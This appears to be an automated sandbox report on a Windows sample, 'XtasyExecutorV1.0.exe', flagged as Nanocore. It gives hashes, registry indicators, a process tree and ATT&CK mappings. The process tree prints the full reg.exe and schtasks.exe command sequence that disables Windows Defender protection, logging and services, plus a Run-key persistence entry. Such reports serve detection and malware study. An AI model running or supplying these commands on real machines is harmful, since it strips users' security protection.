Analysis
-
max time kernel
80s -
max time network
95s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
17-12-2024 19:36
Behavioral task
behavioral1
Sample
XtasyExecutorV1.0.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
XtasyExecutorV1.0.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
XtasyExecutorV1.0.exe
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral4
Sample
XtasyExecutorV1.0.exe
Resource
win11-20241007-en
General
-
Target
XtasyExecutorV1.0.exe
-
Size
203KB
-
MD5
b8fb078ab0ff9ca107d79112a1a56255
-
SHA1
cebcb36d55bb63688bd9ffbf7d372ba41b0e959e
-
SHA256
2d73aa44284a435c2cc78b6a80a4326f42a28dfa598e5dfd20ba3f612afdcd37
-
SHA512
1a817eb1043122eb183821558cd9541f4a34f76551f52040f8c2e3caf8dd082a88d80799be868bbb84fdf339cb462a63bb14bceae869345485b565a19d01f1f9
-
SSDEEP
3072:AzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIseXxluxTkQ0yyMH+elFEGxdb8:ALV6Bta6dtJmakIM5NhkQl3EGrbmMZ3k
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Nanocore family
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WPA Service = "C:\\Program Files (x86)\\WPA Service\\wpasv.exe" XtasyExecutorV1.0.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA XtasyExecutorV1.0.exe -
Modifies Security services 2 TTPs 4 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4" reg.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\WPA Service\wpasv.exe XtasyExecutorV1.0.exe File opened for modification C:\Program Files (x86)\WPA Service\wpasv.exe XtasyExecutorV1.0.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XtasyExecutorV1.0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Suspicious behavior: EnumeratesProcesses 42 IoCs
pid Process 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe 3044 XtasyExecutorV1.0.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3044 XtasyExecutorV1.0.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3044 XtasyExecutorV1.0.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3044 wrote to memory of 2640 3044 XtasyExecutorV1.0.exe 30 PID 3044 wrote to memory of 2640 3044 XtasyExecutorV1.0.exe 30 PID 3044 wrote to memory of 2640 3044 XtasyExecutorV1.0.exe 30 PID 3044 wrote to memory of 2640 3044 XtasyExecutorV1.0.exe 30 PID 2640 wrote to memory of 2796 2640 cmd.exe 32 PID 2640 wrote to memory of 2796 2640 cmd.exe 32 PID 2640 wrote to memory of 2796 2640 cmd.exe 32 PID 2640 wrote to memory of 2796 2640 cmd.exe 32 PID 2640 wrote to memory of 2784 2640 cmd.exe 33 PID 2640 wrote to memory of 2784 2640 cmd.exe 33 PID 2640 wrote to memory of 2784 2640 cmd.exe 33 PID 2640 wrote to memory of 2784 2640 cmd.exe 33 PID 2640 wrote to memory of 2724 2640 cmd.exe 34 PID 2640 wrote to memory of 2724 2640 cmd.exe 34 PID 2640 wrote to memory of 2724 2640 cmd.exe 34 PID 2640 wrote to memory of 2724 2640 cmd.exe 34 PID 2640 wrote to memory of 796 2640 cmd.exe 35 PID 2640 wrote to memory of 796 2640 cmd.exe 35 PID 2640 wrote to memory of 796 2640 cmd.exe 35 PID 2640 wrote to memory of 796 2640 cmd.exe 35 PID 2640 wrote to memory of 2808 2640 cmd.exe 36 PID 2640 wrote to memory of 2808 2640 cmd.exe 36 PID 2640 wrote to memory of 2808 2640 cmd.exe 36 PID 2640 wrote to memory of 2808 2640 cmd.exe 36 PID 2640 wrote to memory of 2616 2640 cmd.exe 37 PID 2640 wrote to memory of 2616 2640 cmd.exe 37 PID 2640 wrote to memory of 2616 2640 cmd.exe 37 PID 2640 wrote to memory of 2616 2640 cmd.exe 37 PID 2640 wrote to memory of 2624 2640 cmd.exe 38 PID 2640 wrote to memory of 2624 2640 cmd.exe 38 PID 2640 wrote to memory of 2624 2640 cmd.exe 38 PID 2640 wrote to memory of 2624 2640 cmd.exe 38 PID 2640 wrote to memory of 2632 2640 cmd.exe 39 PID 2640 wrote to memory of 2632 2640 cmd.exe 39 PID 2640 wrote to memory of 2632 2640 cmd.exe 39 PID 2640 wrote to memory of 2632 2640 cmd.exe 39 PID 2640 wrote to memory of 2656 2640 cmd.exe 40 PID 2640 wrote to memory of 2656 2640 cmd.exe 40 PID 2640 wrote to memory of 2656 2640 cmd.exe 40 PID 2640 wrote to memory of 2656 2640 cmd.exe 40 PID 2640 wrote to memory of 2684 2640 cmd.exe 41 PID 2640 wrote to memory of 2684 2640 cmd.exe 41 PID 2640 wrote to memory of 2684 2640 cmd.exe 41 PID 2640 wrote to memory of 2684 2640 cmd.exe 41 PID 2640 wrote to memory of 2732 2640 cmd.exe 42 PID 2640 wrote to memory of 2732 2640 cmd.exe 42 PID 2640 wrote to memory of 2732 2640 cmd.exe 42 PID 2640 wrote to memory of 2732 2640 cmd.exe 42 PID 2640 wrote to memory of 1852 2640 cmd.exe 43 PID 2640 wrote to memory of 1852 2640 cmd.exe 43 PID 2640 wrote to memory of 1852 2640 cmd.exe 43 PID 2640 wrote to memory of 1852 2640 cmd.exe 43 PID 2640 wrote to memory of 3068 2640 cmd.exe 44 PID 2640 wrote to memory of 3068 2640 cmd.exe 44 PID 2640 wrote to memory of 3068 2640 cmd.exe 44 PID 2640 wrote to memory of 3068 2640 cmd.exe 44 PID 2640 wrote to memory of 3064 2640 cmd.exe 45 PID 2640 wrote to memory of 3064 2640 cmd.exe 45 PID 2640 wrote to memory of 3064 2640 cmd.exe 45 PID 2640 wrote to memory of 3064 2640 cmd.exe 45 PID 2640 wrote to memory of 1940 2640 cmd.exe 46 PID 2640 wrote to memory of 1940 2640 cmd.exe 46 PID 2640 wrote to memory of 1940 2640 cmd.exe 46 PID 2640 wrote to memory of 1940 2640 cmd.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\XtasyExecutorV1.0.exe"C:\Users\Admin\AppData\Local\Temp\XtasyExecutorV1.0.exe"1⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\d7d62d2a.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
- System Location Discovery: System Language Discovery
PID:2796
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:2784
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:2724
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:796
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:2808
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2616
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2624
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2632
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2656
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2684
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:2732
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:1852
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:3068
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵
- System Location Discovery: System Language Discovery
PID:3064
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:1940
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:2452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:1648
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:1324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:1268
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:1704
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:1652
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵
- System Location Discovery: System Language Discovery
PID:2052
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵
- System Location Discovery: System Language Discovery
PID:1064
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵
- System Location Discovery: System Language Discovery
PID:588
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵
- System Location Discovery: System Language Discovery
PID:1720
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵
- System Location Discovery: System Language Discovery
PID:2956
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2368
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:388
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1148
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1740
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:1788
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD510e9d7377b7fd4df43145ae4c8b136b3
SHA14002ba143ff336f631d36c6afd93464822ba541e
SHA2561b1b51dbe669925f941f0b3e04c7d00f29af6746179a7b72a58391720cd23da1
SHA512c28b439ab8fdc3e8da7217250b5f13be1613b0acf5677758d65fe7e46f0abdea08db73ecce5ca38fb88c8c25064fddc04e1f23d4d70058d27a0ba23a980fe885